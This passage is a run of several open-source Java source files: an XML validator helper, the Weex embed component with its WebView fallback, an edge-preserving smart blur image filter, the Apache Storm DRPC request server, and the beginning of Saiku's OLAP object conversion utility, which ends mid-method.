declarePrefix0(XMLSymbols.EMPTY_STRING, value.length() != 0 ? fSymbolTable.addSymbol(value) : null);
}
}
}
}
currentNode = currentNode.getParentNode();
}
}
}
private void declarePrefix0(String prefix, String uri) {
// resize array, if needed
if (fNamespaceSize == fNamespace.length) {
String[] namespacearray = new String[fNamespaceSize * 2];
System.arraycopy(fNamespace, 0, namespacearray, 0, fNamespaceSize);
fNamespace = namespacearray;
}
// bind prefix to uri in current context
fNamespace[fNamespaceSize++] = prefix;
fNamespace[fNamespaceSize++] = uri;
}
private String getURI0(String prefix) {
// find prefix in the DOM context
for (int i = 0; i < fNamespaceSize; i += 2) {
if (fNamespace[i] == prefix) {
return fNamespace[i + 1];
}
}
// prefix not found
return null;
}
}
} // DOMValidatorHelper
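// Illustrative caller-side view (standard javax.xml.validation API; the schema file and
// document are placeholders). When Xerces provides the JAXP implementation and the source
// is a DOMSource, validate() is routed to this helper:
//
//   SchemaFactory sf = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
//   Schema schema = sf.newSchema(new File("schema.xsd"));
//   Validator validator = schema.newValidator();
//   validator.validate(new DOMSource(document), new DOMResult());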
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package com.taobao.weex.ui.component;
import android.annotation.SuppressLint;
import android.text.TextUtils;
import android.view.Gravity;
import android.view.View;
import android.view.ViewGroup;
import android.webkit.WebView;
import android.widget.FrameLayout;
import android.widget.ImageView;
import com.taobao.weappplus_sdk.R;
import com.taobao.weex.IWXRenderListener;
import com.taobao.weex.WXRenderErrorCode;
import com.taobao.weex.WXSDKInstance;
import com.taobao.weex.annotation.Component;
import com.taobao.weex.common.Constants;
import com.taobao.weex.common.WXPerformance;
import com.taobao.weex.common.WXRenderStrategy;
import com.taobao.weex.dom.WXDomObject;
import com.taobao.weex.utils.WXLogUtils;
import com.taobao.weex.utils.WXUtils;
import com.taobao.weex.utils.WXViewUtils;
@Component(lazyload = false)
public class WXEmbed extends WXDiv implements WXSDKInstance.OnInstanceVisibleListener,NestedContainer {
public static final String ITEM_ID = "itemId";
private String src;
private WXSDKInstance mNestedInstance;
private static int ERROR_IMG_WIDTH = (int) WXViewUtils.getRealPxByWidth(270,750);
private static int ERROR_IMG_HEIGHT = (int) WXViewUtils.getRealPxByWidth(260,750);
private boolean mIsVisible = true;
private EmbedRenderListener mListener;
public interface EmbedManager {
WXEmbed getEmbed(String itemId);
void putEmbed(String itemId,WXEmbed comp);
}
public static class FailToH5Listener extends ClickToReloadListener {
@SuppressLint("SetJavaScriptEnabled")
@Override
public void onException(NestedContainer comp, String errCode, String msg) {
//downgrade embed
if( errCode != null && comp instanceof WXEmbed && errCode.startsWith("1|")) {
ViewGroup container = comp.getViewContainer();
WebView webView = new WebView(container.getContext());
ViewGroup.LayoutParams params = new ViewGroup.LayoutParams(ViewGroup.LayoutParams.MATCH_PARENT, ViewGroup.LayoutParams.MATCH_PARENT);
webView.setLayoutParams(params);
webView.getSettings().setJavaScriptEnabled(true);
//WebView Remote Code Execution Vulnerability
webView.removeJavascriptInterface("searchBoxJavaBridge_");
webView.removeJavascriptInterface("accessibility");
webView.removeJavascriptInterface("accessibilityTraversal");
webView.getSettings().setSavePassword(false);
container.removeAllViews();
container.addView(webView);
webView.loadUrl(((WXEmbed) comp).src);
}else{
super.onException(comp,errCode,msg);
}
}
}
/**
* Default event listener.
*/
public static class ClickToReloadListener implements OnNestedInstanceEventListener {
@Override
public void onException(NestedContainer container, String errCode, String msg) {
if (TextUtils.equals(errCode, WXRenderErrorCode.WX_NETWORK_ERROR) && container instanceof WXEmbed) {
final WXEmbed comp = ((WXEmbed)container);
final ImageView imageView = new ImageView(comp.getContext());
imageView.setImageResource(R.drawable.error);
FrameLayout.LayoutParams layoutParams = new FrameLayout.LayoutParams(ERROR_IMG_WIDTH, ERROR_IMG_HEIGHT);
layoutParams.gravity = Gravity.CENTER;
imageView.setLayoutParams(layoutParams);
imageView.setScaleType(ImageView.ScaleType.FIT_XY);
imageView.setAdjustViewBounds(true);
imageView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
imageView.setOnClickListener(null);
imageView.setEnabled(false);
comp.loadContent();
}
});
FrameLayout hostView = comp.getHostView();
hostView.removeAllViews();
hostView.addView(imageView);
WXLogUtils.e("WXEmbed", "NetWork failure :" + errCode + ",\n error message :" + msg);
}
}
@Override
public boolean onPreCreate(NestedContainer comp, String src) {
return true;
}
@Override
public String transformUrl(String origin) {
return origin;
}
@Override
public void onCreated(NestedContainer comp, WXSDKInstance nestedInstance) {
}
}
static class EmbedRenderListener implements IWXRenderListener {
WXEmbed mComponent;
OnNestedInstanceEventListener mEventListener;
EmbedRenderListener(WXEmbed comp) {
mComponent = comp;
mEventListener = new ClickToReloadListener();
}
@Override
public void onViewCreated(WXSDKInstance instance, View view) {
FrameLayout hostView = mComponent.getHostView();
hostView.removeAllViews();
hostView.addView(view);
}
@Override
public void onRenderSuccess(WXSDKInstance instance, int width, int height) {
}
@Override
public void onRefreshSuccess(WXSDKInstance instance, int width, int height) {
}
@Override
public void onException(WXSDKInstance instance, String errCode, String msg) {
if (mEventListener != null) {
mEventListener.onException(mComponent, errCode, msg);
}
}
}
@Deprecated
public WXEmbed(WXSDKInstance instance, WXDomObject dom, WXVContainer parent, String instanceId, boolean isLazy) {
this(instance,dom,parent);
}
public WXEmbed(WXSDKInstance instance, WXDomObject node, WXVContainer parent) {
super(instance, node, parent);
mListener = new EmbedRenderListener(this);
ERROR_IMG_WIDTH = (int) WXViewUtils.getRealPxByWidth(270,instance.getInstanceViewPortWidth());
ERROR_IMG_HEIGHT = (int) WXViewUtils.getRealPxByWidth(260,instance.getInstanceViewPortWidth());
if(instance instanceof EmbedManager) {
Object itemId = node.getAttrs().get(ITEM_ID);
if (itemId != null) {
((EmbedManager) instance).putEmbed(itemId.toString(), this);
}
}
}
@Override
public void setOnNestEventListener(OnNestedInstanceEventListener listener){
mListener.mEventListener = listener;
}
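// Illustrative wiring (hypothetical host code: assumes the enclosing WXSDKInstance
// implements EmbedManager and that an embed with itemId "item-1" exists; the URL is a
// placeholder):
//
//   WXEmbed embed = ((WXEmbed.EmbedManager) rootInstance).getEmbed("item-1");
//   embed.setOnNestEventListener(new WXEmbed.FailToH5Listener()); // fall back to a WebView on "1|..." errors
//   embed.renderNewURL("https://example.com/nested-page.js");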
@Override
public ViewGroup getViewContainer() {
return getHostView();
}
@Override
protected boolean setProperty(String key, Object param) {
switch (key) {
case Constants.Name.SRC:
String src = WXUtils.getString(param,null);
if (src != null)
setSrc(src);
return true;
}
return super.setProperty(key, param);
}
@Override
public void renderNewURL(String url) {
src = url;
loadContent();
}
@Override
public void reload() {
if (!TextUtils.isEmpty(src)) {
loadContent();
}
}
public String getOriginUrl() {
return originUrl;
}
public void setOriginUrl(String originUrl) {
this.originUrl = originUrl;
}
private String originUrl;
@WXComponentProp(name = Constants.Name.SRC)
public void setSrc(String src) {
originUrl=src;
this.src = src;
if (mNestedInstance != null) {
mNestedInstance.destroy();
mNestedInstance = null;
}
if (mIsVisible && !TextUtils.isEmpty(this.src)) {
loadContent();
}
}
public String getSrc() {
return src;
}
/**
* Load embed content; the default behavior is to create a nested instance.
*/
protected void loadContent(){
mNestedInstance = createInstance();
if(mListener != null && mListener.mEventListener != null){
// Notify onCreated only when the listener did not cancel the render;
// createInstance() already returns null when onPreCreate() vetoes it.
if (mListener.mEventListener.onPreCreate(this, src)) {
mListener.mEventListener.onCreated(this, mNestedInstance);
}
}
}
private WXSDKInstance createInstance() {
WXSDKInstance sdkInstance = getInstance().createNestedInstance(this);
getInstance().addOnInstanceVisibleListener(this);
sdkInstance.registerRenderListener(mListener);
String url=src;
if(mListener != null && mListener.mEventListener != null){
url=mListener.mEventListener.transformUrl(src);
if(!mListener.mEventListener.onPreCreate(this,src)){
//cancel render
return null;
}
}
if(TextUtils.isEmpty(url)){
mListener.mEventListener.onException(this,WXRenderErrorCode.WX_USER_INTERCEPT_ERROR,"degradeToH5");
return sdkInstance;
}
ViewGroup.LayoutParams layoutParams = getHostView().getLayoutParams();
sdkInstance.renderByUrl(WXPerformance.DEFAULT,
url,
null, null, layoutParams.width,
layoutParams.height,
WXRenderStrategy.APPEND_ASYNC);
return sdkInstance;
}
@Override
public void setVisibility(String visibility) {
super.setVisibility(visibility);
boolean visible = TextUtils.equals(visibility, Constants.Value.VISIBLE);
if (!TextUtils.isEmpty(src) && visible) {
if (mNestedInstance == null) {
loadContent();
} else {
mNestedInstance.onViewAppear();
}
}
if (!visible) {
if (mNestedInstance != null) {
mNestedInstance.onViewDisappear();
}
}
mIsVisible = visible;
}
@Override
public void destroy() {
super.destroy();
if (mNestedInstance != null) {
mNestedInstance.destroy();
mNestedInstance = null;
}
src = null;
if (getInstance() != null) {
getInstance().removeOnInstanceVisibleListener(this);
}
}
@Override
public void onAppear() {
//appear event from root instance will not trigger visibility change
if(mIsVisible && mNestedInstance != null){
WXComponent comp = mNestedInstance.getRootComponent();
if(comp != null)
comp.fireEvent(Constants.Event.VIEWAPPEAR);
}
}
@Override
public void onDisappear() {
//disappear event from root instance will not trigger visibility change
if(mIsVisible && mNestedInstance != null){
WXComponent comp = mNestedInstance.getRootComponent();
if(comp != null)
comp.fireEvent(Constants.Event.VIEWDISAPPEAR);
}
}
@Override
public void onActivityStart() {
super.onActivityStart();
if (mNestedInstance != null) {
mNestedInstance.onActivityStart();
}
}
@Override
public void onActivityResume() {
super.onActivityResume();
if (mNestedInstance != null) {
mNestedInstance.onActivityResume();
}
}
@Override
public void onActivityPause() {
super.onActivityPause();
if (mNestedInstance != null) {
mNestedInstance.onActivityPause();
}
}
@Override
public void onActivityStop() {
super.onActivityStop();
if (mNestedInstance != null) {
mNestedInstance.onActivityStop();
}
}
@Override
public void onActivityDestroy() {
super.onActivityDestroy();
if (mNestedInstance != null) {
mNestedInstance.onActivityDestroy();
}
}
}
|
|
/*
Copyright 2006 Jerry Huxtable
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package com.jhlabs.image;
import java.awt.*;
import java.awt.image.*;
import java.awt.geom.*;
/**
* A filter which performs a "smart blur", i.e. a blur which blurs smooth parts of the image while preserving edges.
*/
public class SmartBlurFilter extends AbstractBufferedImageOp {
private int hRadius = 5;
private int vRadius = 5;
private int threshold = 10;
public BufferedImage filter( BufferedImage src, BufferedImage dst ) {
int width = src.getWidth();
int height = src.getHeight();
if ( dst == null )
dst = createCompatibleDestImage( src, null );
int[] inPixels = new int[width*height];
int[] outPixels = new int[width*height];
getRGB( src, 0, 0, width, height, inPixels );
Kernel kernel = GaussianFilter.makeKernel(hRadius);
thresholdBlur( kernel, inPixels, outPixels, width, height, true );
thresholdBlur( kernel, outPixels, inPixels, height, width, true );
setRGB( dst, 0, 0, width, height, inPixels );
return dst;
}
/**
* Convolve with a kernel consisting of one row
*/
private void thresholdBlur(Kernel kernel, int[] inPixels, int[] outPixels, int width, int height, boolean alpha) {
int index = 0;
float[] matrix = kernel.getKernelData( null );
int cols = kernel.getWidth();
int cols2 = cols/2;
for (int y = 0; y < height; y++) {
int ioffset = y*width;
int outIndex = y;
for (int x = 0; x < width; x++) {
float r = 0, g = 0, b = 0, a = 0;
int moffset = cols2;
int rgb1 = inPixels[ioffset+x];
int a1 = (rgb1 >> 24) & 0xff;
int r1 = (rgb1 >> 16) & 0xff;
int g1 = (rgb1 >> 8) & 0xff;
int b1 = rgb1 & 0xff;
float af = 0, rf = 0, gf = 0, bf = 0;
for (int col = -cols2; col <= cols2; col++) {
float f = matrix[moffset+col];
if (f != 0) {
int ix = x+col;
if (!(0 <= ix && ix < width))
ix = x;
int rgb2 = inPixels[ioffset+ix];
int a2 = (rgb2 >> 24) & 0xff;
int r2 = (rgb2 >> 16) & 0xff;
int g2 = (rgb2 >> 8) & 0xff;
int b2 = rgb2 & 0xff;
int d;
d = a1-a2;
if ( d >= -threshold && d <= threshold ) {
a += f * a2;
af += f;
}
d = r1-r2;
if ( d >= -threshold && d <= threshold ) {
r += f * r2;
rf += f;
}
d = g1-g2;
if ( d >= -threshold && d <= threshold ) {
g += f * g2;
gf += f;
}
d = b1-b2;
if ( d >= -threshold && d <= threshold ) {
b += f * b2;
bf += f;
}
}
}
a = af == 0 ? a1 : a/af;
r = rf == 0 ? r1 : r/rf;
g = gf == 0 ? g1 : g/gf;
b = bf == 0 ? b1 : b/bf;
int ia = alpha ? PixelUtils.clamp((int)(a+0.5)) : 0xff;
int ir = PixelUtils.clamp((int)(r+0.5));
int ig = PixelUtils.clamp((int)(g+0.5));
int ib = PixelUtils.clamp((int)(b+0.5));
outPixels[outIndex] = (ia << 24) | (ir << 16) | (ig << 8) | ib;
outIndex += height;
}
}
}
/**
* Set the horizontal size of the blur.
* @param hRadius the radius of the blur in the horizontal direction
* @min-value 0
* @see #getHRadius
*/
public void setHRadius(int hRadius) {
this.hRadius = hRadius;
}
/**
* Get the horizontal size of the blur.
* @return the radius of the blur in the horizontal direction
* @see #setHRadius
*/
public int getHRadius() {
return hRadius;
}
/**
* Set the vertical size of the blur.
* @param vRadius the radius of the blur in the vertical direction
* @min-value 0
* @see #getVRadius
*/
public void setVRadius(int vRadius) {
this.vRadius = vRadius;
}
/**
* Get the vertical size of the blur.
* @return the radius of the blur in the vertical direction
* @see #setVRadius
*/
public int getVRadius() {
return vRadius;
}
/**
* Set the radius of the effect.
* @param radius the radius
* @min-value 0
* @see #getRadius
*/
public void setRadius(int radius) {
this.hRadius = this.vRadius = radius;
}
/**
* Get the radius of the effect.
* @return the radius
* @see #setRadius
*/
public int getRadius() {
return hRadius;
}
/**
* Set the threshold value.
* @param threshold the threshold value
* @see #getThreshold
*/
public void setThreshold(int threshold) {
this.threshold = threshold;
}
/**
* Get the threshold value.
* @return the threshold value
* @see #setThreshold
*/
public int getThreshold() {
return threshold;
}
public String toString() {
return "Blur/Smart Blur...";
}
}
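// Hedged usage sketch, not part of the original file: applies the smart blur to an
// image read from disk. The file names are placeholders; fully qualified names are
// used for ImageIO/File so the import section above stays untouched.
class SmartBlurFilterExample {
    public static void main(String[] args) throws Exception {
        BufferedImage src = javax.imageio.ImageIO.read(new java.io.File("in.png"));
        SmartBlurFilter filter = new SmartBlurFilter();
        filter.setRadius(5);      // blur radius in pixels (horizontal and vertical)
        filter.setThreshold(10);  // channel differences above this are treated as edges
        BufferedImage dst = filter.filter(src, null);
        javax.imageio.ImageIO.write(dst, "png", new java.io.File("out.png"));
    }
}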
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.storm.daemon.drpc;
import com.codahale.metrics.Meter;
import java.security.Principal;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Timer;
import java.util.TimerTask;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ConcurrentLinkedQueue;
import java.util.concurrent.atomic.AtomicLong;
import org.apache.storm.DaemonConfig;
import org.apache.storm.daemon.StormCommon;
import org.apache.storm.generated.AuthorizationException;
import org.apache.storm.generated.DRPCExceptionType;
import org.apache.storm.generated.DRPCExecutionException;
import org.apache.storm.generated.DRPCRequest;
import org.apache.storm.logging.ThriftAccessLogger;
import org.apache.storm.metric.StormMetricsRegistry;
import org.apache.storm.security.auth.IAuthorizer;
import org.apache.storm.security.auth.ReqContext;
import org.apache.storm.security.auth.authorizer.DRPCAuthorizerBase;
import org.apache.storm.shade.com.google.common.annotations.VisibleForTesting;
import org.apache.storm.utils.ObjectReader;
import org.apache.storm.utils.WrappedAuthorizationException;
import org.apache.storm.utils.WrappedDRPCExecutionException;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class DRPC implements AutoCloseable {
private static final Logger LOG = LoggerFactory.getLogger(DRPC.class);
private static final DRPCRequest NOTHING_REQUEST = new DRPCRequest("", "");
private static final DRPCExecutionException TIMED_OUT = new WrappedDRPCExecutionException("Timed Out");
private static final DRPCExecutionException SHUT_DOWN = new WrappedDRPCExecutionException("Server Shutting Down");
private static final DRPCExecutionException DEFAULT_FAILED = new WrappedDRPCExecutionException("Request failed");
private static final Meter meterServerTimedOut = StormMetricsRegistry.registerMeter("drpc:num-server-timedout-requests");
private static final Meter meterExecuteCalls = StormMetricsRegistry.registerMeter("drpc:num-execute-calls");
private static final Meter meterResultCalls = StormMetricsRegistry.registerMeter("drpc:num-result-calls");
private static final Meter meterFailRequestCalls = StormMetricsRegistry.registerMeter("drpc:num-failRequest-calls");
private static final Meter meterFetchRequestCalls = StormMetricsRegistry.registerMeter("drpc:num-fetchRequest-calls");
static {
TIMED_OUT.set_type(DRPCExceptionType.SERVER_TIMEOUT);
SHUT_DOWN.set_type(DRPCExceptionType.SERVER_SHUTDOWN);
DEFAULT_FAILED.set_type(DRPCExceptionType.FAILED_REQUEST);
}
//Waiting to be fetched
private final ConcurrentHashMap<String, ConcurrentLinkedQueue<OutstandingRequest>> _queues =
new ConcurrentHashMap<>();
//Waiting to be returned
private final ConcurrentHashMap<String, OutstandingRequest> _requests =
new ConcurrentHashMap<>();
private final Timer _timer = new Timer();
private final AtomicLong _ctr = new AtomicLong(0);
private final IAuthorizer _auth;
public DRPC(Map<String, Object> conf) {
this(mkAuthorizationHandler((String) conf.get(DaemonConfig.DRPC_AUTHORIZER), conf),
ObjectReader.getInt(conf.get(DaemonConfig.DRPC_REQUEST_TIMEOUT_SECS), 600) * 1000);
}
public DRPC(IAuthorizer auth, long timeoutMs) {
_auth = auth;
_timer.scheduleAtFixedRate(new TimerTask() {
@Override
public void run() {
cleanupAll(timeoutMs, TIMED_OUT);
}
}, timeoutMs / 2, timeoutMs / 2);
}
private static IAuthorizer mkAuthorizationHandler(String klassname, Map<String, Object> conf) {
try {
return StormCommon.mkAuthorizationHandler(klassname, conf);
} catch (Exception e) {
throw new RuntimeException(e);
}
}
private static void logAccess(String operation, String function) {
logAccess(ReqContext.context(), operation, function);
}
private static void logAccess(ReqContext reqContext, String operation, String function) {
ThriftAccessLogger.logAccessFunction(reqContext.requestID(), reqContext.remoteAddress(), reqContext.principal(), operation,
function);
}
@VisibleForTesting
static void checkAuthorization(ReqContext reqContext, IAuthorizer auth, String operation, String function)
throws AuthorizationException {
checkAuthorization(reqContext, auth, operation, function, true);
}
private static void checkAuthorization(ReqContext reqContext, IAuthorizer auth, String operation, String function, boolean log)
throws AuthorizationException {
if (reqContext != null && log) {
logAccess(reqContext, operation, function);
}
if (auth != null) {
Map<String, Object> map = new HashMap<>();
map.put(DRPCAuthorizerBase.FUNCTION_NAME, function);
if (!auth.permit(reqContext, operation, map)) {
Principal principal = reqContext.principal();
String user = (principal != null) ? principal.getName() : "unknown";
throw new WrappedAuthorizationException("DRPC request '" + operation + "' for '" + user + "' user is not authorized");
}
}
}
private void checkAuthorization(String operation, String function) throws AuthorizationException {
checkAuthorization(ReqContext.context(), _auth, operation, function);
}
private void checkAuthorizationNoLog(String operation, String function) throws AuthorizationException {
checkAuthorization(ReqContext.context(), _auth, operation, function, false);
}
private void cleanup(String id) {
OutstandingRequest req = _requests.remove(id);
if (req != null && !req.wasFetched()) {
_queues.get(req.getFunction()).remove(req);
}
}
private void cleanupAll(long timeoutMs, DRPCExecutionException exp) {
for (Entry<String, OutstandingRequest> e : _requests.entrySet()) {
OutstandingRequest req = e.getValue();
if (req.isTimedOut(timeoutMs)) {
req.fail(exp);
cleanup(e.getKey());
meterServerTimedOut.mark();
}
}
}
private String nextId() {
return String.valueOf(_ctr.incrementAndGet());
}
private ConcurrentLinkedQueue<OutstandingRequest> getQueue(String function) {
if (function == null) {
throw new IllegalArgumentException("The function for a request cannot be null");
}
ConcurrentLinkedQueue<OutstandingRequest> queue = _queues.get(function);
if (queue == null) {
_queues.putIfAbsent(function, new ConcurrentLinkedQueue<>());
queue = _queues.get(function);
}
return queue;
}
public void returnResult(String id, String result) throws AuthorizationException {
meterResultCalls.mark();
LOG.debug("Got a result {} {}", id, result);
OutstandingRequest req = _requests.get(id);
if (req != null) {
checkAuthorization("result", req.getFunction());
req.returnResult(result);
}
}
public DRPCRequest fetchRequest(String functionName) throws AuthorizationException {
meterFetchRequestCalls.mark();
checkAuthorizationNoLog("fetchRequest", functionName);
ConcurrentLinkedQueue<OutstandingRequest> q = getQueue(functionName);
OutstandingRequest req = q.poll();
if (req != null) {
//Only log accesses that fetched something
logAccess("fetchRequest", functionName);
req.fetched();
DRPCRequest ret = req.getRequest();
return ret;
}
return NOTHING_REQUEST;
}
public void failRequest(String id, DRPCExecutionException e) throws AuthorizationException {
meterFailRequestCalls.mark();
LOG.debug("Got a fail {}", id);
OutstandingRequest req = _requests.get(id);
if (req != null) {
checkAuthorization("failRequest", req.getFunction());
if (e == null) {
e = DEFAULT_FAILED;
}
req.fail(e);
}
}
public <T extends OutstandingRequest> T execute(String functionName, String funcArgs, RequestFactory<T> factory) throws
AuthorizationException {
meterExecuteCalls.mark();
checkAuthorization("execute", functionName);
String id = nextId();
LOG.debug("Execute {} {}", functionName, funcArgs);
T req = factory.mkRequest(functionName, new DRPCRequest(funcArgs, id));
_requests.put(id, req);
ConcurrentLinkedQueue<OutstandingRequest> q = getQueue(functionName);
q.add(req);
return req;
}
public String executeBlocking(String functionName, String funcArgs) throws DRPCExecutionException, AuthorizationException {
BlockingOutstandingRequest req = execute(functionName, funcArgs, BlockingOutstandingRequest.FACTORY);
try {
LOG.debug("Waiting for result {} {}", functionName, funcArgs);
return req.getResult();
} catch (DRPCExecutionException e) {
throw e;
} finally {
cleanup(req.getRequest().get_request_id());
}
}
@Override
public void close() {
_timer.cancel();
cleanupAll(0, SHUT_DOWN);
}
}
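// Hedged usage sketch, not part of the original class: wires one client call through the
// in-memory queues that DRPC manages. A worker thread polls for the request and echoes the
// arguments back while the client blocks in executeBlocking(). The "echo" function name and
// the 60s timeout are illustrative only, and no authorizer is configured (auth may be null).
class DrpcUsageSketch {
    static String echoOnce() throws Exception {
        try (DRPC drpc = new DRPC(null, 60_000)) {
            Thread worker = new Thread(() -> {
                try {
                    DRPCRequest req = drpc.fetchRequest("echo");
                    while (req.get_request_id().isEmpty()) {  // NOTHING_REQUEST carries an empty id
                        Thread.sleep(10);
                        req = drpc.fetchRequest("echo");
                    }
                    // echo the arguments straight back as the result
                    drpc.returnResult(req.get_request_id(), req.get_func_args());
                } catch (Exception ignored) {
                    // a real worker would log and retry
                }
            });
            worker.start();
            // blocks until the worker returns a result or the request times out
            return drpc.executeBlocking("echo", "hello");
        }
    }
}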
|
|
/*
* Copyright 2014 OSBI Ltd
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.saiku.olap.util;
import org.saiku.olap.dto.*;
import org.saiku.olap.dto.SaikuSelection.Type;
import org.saiku.olap.query.IQuery;
import org.saiku.service.util.exception.SaikuServiceException;
import org.apache.commons.lang.StringUtils;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import org.olap4j.Axis;
import org.olap4j.OlapException;
import org.olap4j.metadata.*;
import org.olap4j.query.QueryAxis;
import org.olap4j.query.QueryDimension;
import org.olap4j.query.Selection;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.lang.reflect.Constructor;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.Statement;
import java.util.*;
import mondrian.olap.Annotation;
import mondrian.olap4j.Checker;
import mondrian.olap4j.LevelInterface;
import mondrian.olap4j.SaikuMondrianHelper;
/**
* ObjectUtil.
*/
public class ObjectUtil {
private static final Logger LOG = LoggerFactory.getLogger(ObjectUtil.class);
private ObjectUtil() {
}
@NotNull
public static SaikuCube convert(String connection, @NotNull Cube c) {
return new SaikuCube(
connection,
c.getUniqueName(),
c.getName(),
c.getCaption(),
c.getSchema().getCatalog().getName(),
c.getSchema().getName(),
c.isVisible());
}
@NotNull
public static SaikuDimension convert(@NotNull Dimension dim) {
return new SaikuDimension(
dim.getName(),
dim.getUniqueName(),
dim.getCaption(),
dim.getDescription(),
dim.isVisible(),
convertHierarchies(dim.getHierarchies()));
}
@NotNull
private static SaikuDimension convert(@NotNull QueryDimension dim) {
return convert(dim.getDimension());
}
@NotNull
public static List<SaikuDimension> convertQueryDimensions(@NotNull List<QueryDimension> dims) {
List<SaikuDimension> dimList = new ArrayList<>();
for (QueryDimension d : dims) {
dimList.add(convert(d));
}
return dimList;
}
@NotNull
public static List<SaikuDimension> convertDimensions(@NotNull List<Dimension> dims) {
List<SaikuDimension> dimList = new ArrayList<>();
for (Dimension d : dims) {
dimList.add(convert(d));
}
return dimList;
}
@NotNull
public static List<SaikuHierarchy> convertHierarchies(@NotNull List<Hierarchy> hierarchies) {
List<SaikuHierarchy> hierarchyList = new ArrayList<>();
for (Hierarchy h : hierarchies) {
hierarchyList.add(convert(h));
}
return hierarchyList;
}
@NotNull
public static SaikuHierarchy convert(@NotNull Hierarchy hierarchy) {
try {
return new SaikuHierarchy(
hierarchy.getName(),
hierarchy.getUniqueName(),
hierarchy.getCaption(),
hierarchy.getDescription(),
hierarchy.getDimension().getUniqueName(),
hierarchy.isVisible(),
convertLevels(hierarchy.getLevels()),
convertMembers(hierarchy.getRootMembers()));
} catch (OlapException e) {
throw new SaikuServiceException("Cannot get root members", e);
}
}
@NotNull
public static List<SaikuLevel> convertLevels(@NotNull List<Level> levels) {
List<SaikuLevel> levelList = new ArrayList<>();
for (Level l : levels) {
levelList.add(convert(l));
}
return levelList;
}
@NotNull
private static SaikuLevel convert(@NotNull Level level) {
Checker c = new Checker();
try {
try {
Class.forName("mondrian.olap4j.MondrianOlap4jLevelExtend");
//Class.forName("bi.meteorite.CheckClass");
Class<LevelInterface> _tempClass = (Class<LevelInterface>) Class.forName("mondrian.olap4j.MondrianOlap4jLevelExtend");
if (c.checker(level)) {
Constructor<LevelInterface> ctor = _tempClass.getDeclaredConstructor(org.olap4j.metadata.Level.class);
LevelInterface test = ctor.newInstance(level);
HashMap<String, String> m = null;
if (test.getAnnotations() != null) {
m = new HashMap<>();
for (Map.Entry<String, Annotation> entry : test.getAnnotations().entrySet()) {
m.put(entry.getKey(), (String) entry.getValue().getValue());
}
}
return new SaikuLevel(
test.getName(),
test.getUniqueName(),
test.getCaption(),
test.getDescription(),
test.getDimension().getUniqueName(),
test.getHierarchy().getUniqueName(),
test.isVisible(),
test.getLevelType().toString(),
m);
} else {
return new SaikuLevel(
level.getName(),
level.getUniqueName(),
level.getCaption(),
level.getDescription(),
level.getDimension().getUniqueName(),
level.getHierarchy().getUniqueName(),
level.isVisible(),
null, null);
}
} catch (ClassNotFoundException e) {
return new SaikuLevel(
level.getName(),
level.getUniqueName(),
level.getCaption(),
level.getDescription(),
level.getDimension().getUniqueName(),
level.getHierarchy().getUniqueName(),
level.isVisible(),
null, null);
}
} catch (Exception e) {
throw new SaikuServiceException("Cannot convert level: " + level, e);
}
}
@NotNull
public static List<SaikuMember> convertMembers(@NotNull Collection<Member> members) {
List<SaikuMember> memberList = new ArrayList<>();
for (Member m : members) {
memberList.add(convert(m));
}
return memberList;
}
@NotNull
private static List<SaikuSelection> convertSelections(@NotNull List<Selection> selections,
@NotNull QueryDimension dim, @NotNull IQuery query) {
List<SaikuSelection> selectionList = new ArrayList<>();
for (Selection sel : selections) {
selectionList.add(convert(sel, dim, query));
}
return selectionList;
}
private static Level getSelectionLevel(@NotNull Selection sel) {
Level retVal;
if (Level.class.isAssignableFrom(sel.getRootElement().getClass())) {
retVal = (Level) sel.getRootElement();
} else {
retVal = ((Member) sel.getRootElement()).getLevel();
}
return retVal;
}
@NotNull
private static SaikuSelection convert(@NotNull Selection sel, @NotNull QueryDimension dim, @NotNull IQuery query) {
Type type;
String hierarchyUniqueName;
String levelUniqueName;
Level level;
if (Level.class.isAssignableFrom(sel.getRootElement().getClass())) {
level = (Level) sel.getRootElement();
type = SaikuSelection.Type.LEVEL;
hierarchyUniqueName = ((Level) sel.getRootElement()).getHierarchy().getUniqueName();
levelUniqueName = sel.getUniqueName();
} else {
level = ((Member) sel.getRootElement()).getLevel();
type = SaikuSelection.Type.MEMBER;
hierarchyUniqueName = ((Member) sel.getRootElement()).getHierarchy().getUniqueName();
